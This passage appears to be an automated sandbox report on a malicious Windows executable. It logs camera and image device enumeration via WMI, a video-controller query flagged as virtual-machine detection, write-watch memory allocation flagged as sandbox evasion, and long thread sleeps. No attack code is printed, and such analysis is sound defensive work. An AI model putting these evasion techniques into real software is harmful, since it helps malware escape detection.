Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Memory allocated: 750000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Memory allocated: 1A680000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Memory allocated: C60000 memory reserve | memory write watch
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Memory allocated: 1AB80000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 600000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 599871
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 599765
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 599655
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 598696
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 3600000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 598586
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 598125
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 597500
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 596828
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 596344
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 595891
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 595406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 595109
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 594781
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 594516
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 594234
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 593859
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 593516
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 593172
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 592859
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 592437
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 592172
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 591781
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 591437
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 591109
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 590640
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 590422
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 590094
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 589562
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 589109
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 588719
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 588266
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 587750
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 587250
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 586672
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 586250
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 585922
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 585469
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 585062
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 584547
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 584171
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583969
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583772
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583564
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583231
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583050
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582859
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582703
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582536
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582380
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582094
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 300000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 580047
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579762
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579547
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579344
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579156
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578969
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578810
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578609
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578226
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578085
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577937
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577734
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577566
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577219
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577031
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576797
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576594
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576404
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576219
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575968
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575828
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575656
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575437
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575223
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575094
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574984
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574866
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574731
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574622
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574514
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574297
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574187
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574077
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573954
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573810
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573683
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573531
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573418
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573299
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573172
